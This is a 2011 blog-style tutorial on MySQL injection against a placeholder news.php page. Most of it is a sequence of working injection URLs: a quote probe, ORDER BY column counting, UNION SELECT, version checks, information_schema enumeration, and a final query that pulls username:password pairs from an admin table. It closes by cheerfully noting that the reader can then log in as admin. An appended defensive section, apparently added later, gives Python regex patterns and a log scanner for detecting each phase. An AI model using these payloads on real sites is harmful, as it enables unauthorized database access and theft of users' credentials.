Sunday, September 25, 2011

MySQL Injection


Check for vulnerability:
------------------------
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now to test whether it is vulnerable we add a ' (single quote) to the end of the URL,
which gives http://www.site.com/news.php?id=5'
If we get an error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar,
that means it is vulnerable to SQL injection :)
Find the number of columns:
----------------------------
To find the number of columns we use the ORDER BY statement (it tells the database how to order the result).
So how do we use it? We just keep incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like Unknown column '4' in 'order clause' or something like that)
That means it has 3 columns, because we got an error on 4.
Check for UNION function:
-------------------------
With UNION we can select more data in one SQL statement.
So we have
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* is not working or you get some error, then try --
It is a comment and it is important for our query to work properly.
(We already found that the number of columns is 3 in the previous section.)
If we see some numbers on the screen, i.e. 1 or 2 or 3, then the UNION works :)
Check for MySQL version:
------------------------
http://www.site.com/news.php?id=5 union all select 1,2,3,4/*
Let's say that we have the number 4 on the screen. Now, to check the version,
we replace the number 4 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
The version should be greater than 5; if it is less than 5 you have to guess the table name.
Getting table and column name:
-------------------------------
http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
We get the table names. Look for a table named admin or one that holds the login users.
Now to get the column names.
To get the columns, replace the word “table” with “column”:
http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_value
Note: the table name must be given as a hex value (this works most of the time).
We get the columns displayed on the screen: userid, passwd etc.
Now, to retrieve the values, use:
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a, which is the hex value for : (colon), to separate the two fields; char(58) does the same thing:
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on the screen, i.e. admin:admin or admin:somehash.
When you have this, you can log in as admin or some superuser :D
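From the defender's side, every step of the walkthrough above leaves a recognisable trace in the web server log. The following Python is an added example (not from the original post) that scans constructed Apache-style access-log lines for those phases; the IP address, path, timestamps and log lines are all constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit
# One signature per phase of the walkthrough above (quote probe, ORDER BY counting,
# UNION probe, version check, information_schema enumeration, value extraction).
PHASES = [
    ("error-probe",   re.compile(r'^\d+\s*[\'"]\s*$')),
    ("column-count",  re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-probe",   re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version-check", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),
    ("schema-enum",   re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("data-extract",  re.compile(r"\b(group_)?concat\s*\(", re.I)),
]
# Combined-log request line: client, two ident fields, timestamp, method, URL, protocol, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Constructed sample lines that mirror the walkthrough; 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2011:10:00:05 +0000] "GET /news.php?id=5\' HTTP/1.1" 500 731',
    '192.0.2.10 - - [25/Sep/2011:10:00:09 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 500 744',
    '192.0.2.10 - - [25/Sep/2011:10:00:14 +0000] "GET /news.php?id=5%20union%20all%20select%201,2,3/* HTTP/1.1" 200 5200',
    '192.0.2.10 - - [25/Sep/2011:10:00:20 +0000] "GET /news.php?id=5%20union%20all%20select%201,2,3,'
    'group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 5400',
]

def classify_query(raw_qs):
    """Return phase labels, in walkthrough order, found in any decoded parameter value."""
    hits = []
    for _, value in parse_qsl(raw_qs, keep_blank_values=True):
        value = unquote_plus(value)  # second decode catches double-encoded probes
        for label, pattern in PHASES:
            if label not in hits and pattern.search(value):
                hits.append(label)
    return hits

def scan_log(lines):
    """Return (client, path, phases) for each request whose query string matches a phase."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            parts = urlsplit(m["url"])
            phases = classify_query(parts.query)
            if phases:
                alerts.append((m["ip"], parts.path, phases))
    return alerts

def phases_by_client(alerts):  # per-client set of phases, so one source walking several stands out
    summary = {}
    for ip, _, phases in alerts:
        summary.setdefault(ip, set()).update(phases)
    return summary
```

A single client reaching several phases in quick succession, as in the sample, is a far stronger signal than any one regex hit, and it is the sequence a detection rule should alert on.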
